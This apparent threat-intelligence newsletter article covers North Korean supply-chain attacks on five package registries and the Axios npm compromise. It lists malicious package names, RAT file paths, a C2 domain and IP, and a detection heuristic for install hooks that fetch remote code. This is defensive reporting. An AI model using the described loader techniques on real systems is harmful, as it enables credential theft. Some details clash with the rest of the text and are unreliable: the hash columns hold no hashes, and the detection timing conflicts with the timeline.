North Korea Hid 1,700 Malicious Packages Inside Your Dev Team's Tools
npm. PyPI. Go. Rust. PHP. All five ecosystems. Simultaneously. North Korea's Contagious Interview operation just executed the most comprehensive open-source supply chain poisoning campaign ever documented — and then compromised Axios, the JavaScript library with 100 million weekly downloads.
Founder & Cybersecurity Evangelist
Socket Security researcher Kirill Boychenko published intelligence on April 7, 2026 documenting a new cluster within North Korea's long-running Contagious Interview campaign: twelve confirmed malicious packages and two sleeper packages deployed simultaneously across npm, PyPI, Go Modules, crates.io (Rust), and Packagist (PHP). All reused the same staging infrastructure and loader patterns. All functioned as malware loaders designed to fetch platform-specific second-stage payloads delivering infostealers and remote access trojans.
This is not a new campaign. It is an expansion of one. Socket's tracker for Contagious Interview now lists more than 1,700 malicious packages tied to the activity. The April cluster is a small slice of that total — but it is the first time the operation has been documented pushing coordinated, simultaneous packages across five separate registries using shared infrastructure and identical loader logic.
And that is only half the story. A separate, more consequential operation targeted Axios — the most popular JavaScript HTTP client in the world, present in an estimated 80% of cloud environments — by compromising its lead maintainer through a weeks-long social engineering campaign, then using the stolen publishing credentials to inject a backdoor into a live npm package with 100 million weekly downloads.
The packages: what was confirmed across five ecosystems
The packages were published under GitHub aliases including golangorg, aokisasakidev, and aokisasakidev1, with supporting persona networks under maxcointech1010 and maxcointech0000. They impersonated common developer utilities — debug loggers, license validators, HTTP libraries — names chosen because they sound like the kind of thing a developer installs without a second thought.
Socket reported all identified live packages to the affected registries and submitted takedown requests for associated GitHub accounts. The crates.io security team removed logtrace under advisory RUSTSEC-2026-0081. The Go Security team blocked the identified malicious modules. The npm security team removed the aokisasakidev packages. At time of reporting, some packages had been removed. Others remained live.
| Artifact | Type | SHA-256 (Truncated) |
|---|---|---|
| dev-log-core, logger-base, logkitx, pino-debugger, debug-fmt, debug-glitz | npm — registry.npmjs.org | Confirmed malicious — remove immediately |
| logutilkit, apachelicense, fluxhttp, license-utils-kit | PyPI — pypi.org | Confirmed malicious — remove immediately |
| golangorg/formstash, aokisasakidev/mit-license-pkg | Go — pkg.go.dev | Blocked by Go Security team |
| logtrace (RUSTSEC-2026-0081) | Rust — crates.io | Removed under RUSTSEC advisory |
| golangorg/logkit | PHP — packagist.org | Confirmed malicious — remove immediately |
Any instance of msimg32.dll found outside C:\Windows\System32 is an active IOC. Isolate the host immediately. Full hashes and IOC lists are available via the Cisco Talos GitHub repository.
The Axios operation: when North Korea compromised 100 million downloads
The Contagious Interview cross-ecosystem cluster is only one part of a broader offensive. A separate, even more consequential operation targeted Axios — the most popular JavaScript HTTP client library in the world, with approximately 100 million weekly downloads and present in an estimated 80% of cloud environments.
This attack was not a fake package. It was a compromised legitimate one. UNC1069 ran a multi-week social engineering campaign targeting Jason Saayman, the lead maintainer of Axios. They built rapport across messaging platforms, masqueraded as credible contacts, and eventually delivered a remote access trojan that gave them persistent access to his development environment — and the long-lived npm access token that Axios used for publishing.
The Axios maintainer described the campaign as 'extremely well coordinated, looked legit, and was done in a professional manner.' Any engineer who maintains open-source packages with high download counts is a priority target.
Weeks prior — Social engineering campaign begins
UNC1069 builds rapport with Axios maintainer Jason Saayman via Telegram, LinkedIn, and Slack, impersonating credible contacts. A convincing fake meeting link delivers a RAT, giving persistent access to his workstation and the long-lived npm publishing token.
Mar 30, 05:57 UTC — Decoy package pre-staged
A clean version of plain-crypto-js@4.2.0 is published 18 hours early to establish trust in the npm ecosystem. Deliberate pre-staging, not opportunism.
Mar 30, 23:59 UTC — Payload version published
plain-crypto-js@4.2.1 — containing the SILKBELL dropper and WAVESHAPER.V2 RAT — is published to npm.
Mar 31, 00:21 UTC — Axios account takeover and poisoned release
Using the stolen long-lived npm token, attacker publishes axios@1.14.1 and axios@0.30.4, injecting plain-crypto-js@4.2.1 as a runtime dependency. Maintainer's email changed to ifstap@proton.me, locking out the legitimate developer. Any project with ^1.14.0 or ^0.30.0 in package.json automatically installs the backdoored version.
Mar 31, 01:50 UTC — Elastic Security detects and discloses
Automated supply-chain monitoring detects the compromise within approximately six minutes. Elastic files a GitHub Security Advisory and coordinates disclosure with npm and the Axios maintainers.
Mar 31, 03:20 UTC — Malicious versions removed
Both backdoored versions are taken down after approximately three hours. Any environment that ran npm install during that window should be treated as fully compromised.
Apr 1, 2026 — Google GTIG formally attributes to UNC1069
Google's Threat Intelligence Group publicly attributes the Axios compromise to UNC1069, a financially motivated North Korea-nexus threat actor active since 2018, based on WAVESHAPER.V2 usage and C2 infrastructure overlaps.
The payload: WAVESHAPER.V2
The second-stage payload deployed across both the ecosystem packages and the Axios compromise is WAVESHAPER.V2 — a cross-platform RAT with variants for Windows (PowerShell), macOS (native C++ Mach-O binary), and Linux (Python). It is a direct evolution of WAVESHAPER, a backdoor previously attributed exclusively to UNC1069 and historically deployed against the cryptocurrency sector.
Once installed, WAVESHAPER.V2 beacons to its C2 server every 60 seconds using Base64-encoded JSON. The hardcoded user-agent spoofs Internet Explorer 8 on Windows XP — a trivially detectable anomaly on any modern network and an immediate flag in EDR telemetry on macOS and Linux hosts.
WAVESHAPER.V2 supports four commands: kill (terminate the process), rundir (enumerate directory listings), runscript (execute AppleScript, PowerShell, or shell commands), and peinject (execute arbitrary binaries in memory). Target data: cloud credentials, SSH keys, AWS secrets, Kubernetes tokens, and cryptocurrency wallet files.
| Artifact | Type | SHA-256 (Truncated) |
|---|---|---|
| /Library/Caches/com.apple.act.mond | macOS — WAVESHAPER.V2 Mach-O RAT | Disguised as Apple system cache |
| %PROGRAMDATA%\wt.exe | Windows — PowerShell exe | Renamed to mimic Windows Terminal |
| %PROGRAMDATA%\system.bat | Windows — Hidden batch file | Persistence mechanism |
| HKCU:\...\Run\MicrosoftUpdate | Windows — Registry run key | WAVESHAPER.V2 persistence |
| /tmp/ld.py | Linux — Python RAT | Executed via nohup for persistence |
| sfrclak[.]com / 142.11.206.73 | All platforms — C2 | Block at firewall and DNS layer immediately |
| axios@1.14.1 or axios@0.30.4 in lock file | npm — Backdoored Axios versions | Treat as full compromise if found in any lock file |
Any instance of msimg32.dll found outside C:\Windows\System32 is an active IOC. Isolate the host immediately. Full hashes and IOC lists are available via the Cisco Talos GitHub repository.
The threat actor: UNC1069 / Sapphire Sleet / BlueNoroff
The operation is attributed with high confidence to UNC1069, a financially motivated North Korea-nexus threat actor that Google's Mandiant unit has tracked since at least 2018. The group overlaps with several other tracked aliases across different vendor naming conventions, all describing the same cluster of activity: Sapphire Sleet, BlueNoroff, Stardust Chollima, Alluring Pisces, CageyChameleon, CryptoCore, MASAN, and GhostCall.
UNC1069's defining characteristic, per Microsoft, is operating multi-week, low-pressure social engineering campaigns across Telegram, LinkedIn, and Slack — either impersonating known contacts or credible brands, or by leveraging access to previously compromised accounts — before delivering a fraudulent Zoom or Microsoft Teams meeting link.
The Security Alliance (SEAL) blocked 164 UNC1069-linked domains impersonating Microsoft Teams and Zoom services between February 6 and April 7, 2026 alone.
“What we are seeing consistently is ongoing evolution in how DPRK-linked, financially motivated actors operate — shifts in tooling, infrastructure, and targeting — but with clear continuity in behavior and intent.”
— Microsoft Threat Intelligence — Direct Assessment
Why your CI/CD pipeline is the real attack surface
Supply chain attacks against developer tooling work because of a fundamental assumption baked into modern software delivery: that packages from trusted registries can be installed automatically without manual review. CI/CD pipelines pull dependencies, resolve version ranges, and run install hooks without pausing to ask whether the code being fetched is safe.
The postinstall hook is particularly significant. npm, PyPI, and other package managers support hooks that execute arbitrary code when a package is installed — before the developer ever imports or runs the package's advertised functionality. In the Axios attack, the malicious payload executed via plain-crypto-js's postinstall hook the moment npm install ran. The developer never saw a prompt, never ran the malicious code explicitly, and in many cases never knew the package was installed at all — because it was a transitive dependency two levels deep.
What made the Axios attack possible was a compound vulnerability in the trust model. The Axios project used OIDC Trusted Publishing, which is the correct modern approach. But the GitHub Actions workflow still had a long-lived NPM_TOKEN environment variable present. npm defaults to the token if present, allowing the attacker — who had stolen that token via the maintainer's compromised workstation — to bypass the OIDC provenance mechanism entirely.
“This is a well-resourced, prolific, systematic factory-model supply chain threat that treats npm, PyPI, and VS Code as renewable initial access channels into developer environments.”
— Socket Security — April 7, 2026
What to do right now
Eight immediate actions for your security and engineering teams:
Check for compromised Axios versions immediately
Search all repositories, CI build logs, and lock files for axios@1.14.1 or axios@0.30.4. Any environment that installed these versions during the exposure window (March 31, 00:21–03:20 UTC) should be treated as fully compromised. Safe downgrade targets: axios@1.14.0 (1.x users) or axios@0.30.3 (0.x users). Remove plain-crypto-js from all node_modules directories.
Hunt for WAVESHAPER.V2 artifacts across your endpoints
Search for: /Library/Caches/com.apple.act.mond (macOS), %PROGRAMDATA%\wt.exe (Windows), /tmp/ld.py (Linux), %PROGRAMDATA%\system.bat (Windows), and the registry key HKCU:\...\Run\MicrosoftUpdate. Block outbound traffic to sfrclak[.]com and 142.11.206.73 at firewall and DNS layers. If any artifact is found, assume full compromise and rotate all credentials immediately.
Cross-reference all dependencies against the confirmed package list
Check npm for: dev-log-core, logger-base, logkitx, pino-debugger, debug-fmt, debug-glitz. Check PyPI for: logutilkit, apachelicense, fluxhttp, license-utils-kit. Check Go for: golangorg/formstash, aokisasakidev/mit-license-pkg. Check Rust for: logtrace. Check PHP/Packagist for: golangorg/logkit. Full IOC lists maintained at socket.dev.
Pin direct and transitive dependencies to known-good versions
Remove caret (^) and tilde (~) version specifiers for critical dependencies to prevent automatic resolution to new versions. Commit and enforce a lock file in CI. Resolve transitive dependencies explicitly — the Axios attack succeeded through a two-level transitive dependency that most teams would not manually review.
Flag any utility package that contacts remote infrastructure on install
Treat as malicious until proven otherwise any package that contacts remote infrastructure during installation, retrieves a downloadUrl, rewrites cloud-storage links, downloads archives, decodes remote content, or spawns interpreters or binaries from postinstall hooks. This is the defining signature of the Contagious Interview loader design.
Audit CI/CD pipeline runs for the affected time windows
Review CI logs from March 31, 2026 and any build runs that installed the confirmed malicious packages. Pay particular attention to runs in Docker containers or ephemeral runners — the malware self-deletes after execution. Rotate any cloud credentials, SSH keys, AWS secrets, or Kubernetes tokens accessible from affected build environments.
Eliminate long-lived npm tokens from your publishing workflows
Audit all GitHub Actions and CI workflows that publish to npm, PyPI, crates.io, or other registries. Remove long-lived tokens and enforce OIDC-only publishing flows. The Axios attack bypassed OIDC Trusted Publishing precisely because a long-lived NPM_TOKEN was still present as a fallback. A stolen token that cannot be used to publish is not an attack vector.
Educate engineering teams about UNC1069's social engineering playbook
UNC1069 runs multi-week, low-pressure campaigns on Telegram, LinkedIn, and Slack — impersonating known contacts, credible brands, and previously compromised accounts — before delivering a fake Zoom or Teams meeting link. Any engineer who maintains open-source packages with high download counts is a priority target.
The bottom line
The combination of the Contagious Interview ecosystem packages and the Axios maintainer compromise tells a coherent strategic story. The typosquatting campaign requires a developer to make a mistake — installing the wrong package. The maintainer compromise required no developer mistake at all. It required only that Axios had 100 million weekly downloads, that its maintainer was reachable on Telegram and LinkedIn, and that a long-lived npm token existed as a fallback.
North Korea has built a factory-model capability for poisoning open-source supply chains at scale — 1,700 packages across five ecosystems, with shared infrastructure, identical loader logic, and now confirmed access to a library present in 80% of cloud environments. The capability is fully operational.
The correct response is not to treat this as an npm problem or a Python problem or a Go problem. It is a trust model problem that runs through every package registry where automated CI/CD systems install dependencies without human review. The attack surface is every software project that has ever run npm install, pip install, go get, cargo add, or composer require — and resolved a version range automatically.
Any environment that ran npm install between March 31, 00:21 and 03:20 UTC and resolved to axios@1.14.1 or axios@0.30.4 should be treated as fully compromised regardless of whether active C2 communication was observed. The malware self-deletes after execution. Absence of artifacts does not mean absence of compromise.
Get threat intel before your inbox does.
50,000+ security professionals read Decryption Digest for early warnings on zero-days, ransomware, and nation-state campaigns. Free, weekly, no spam.
Unsubscribe anytime. We never sell your data.
Founder & Cybersecurity Evangelist, Decryption Digest
Cybersecurity professional with expertise in threat intelligence, vulnerability research, and enterprise security. Covers zero-days, ransomware, and nation-state operations for 50,000+ security professionals weekly.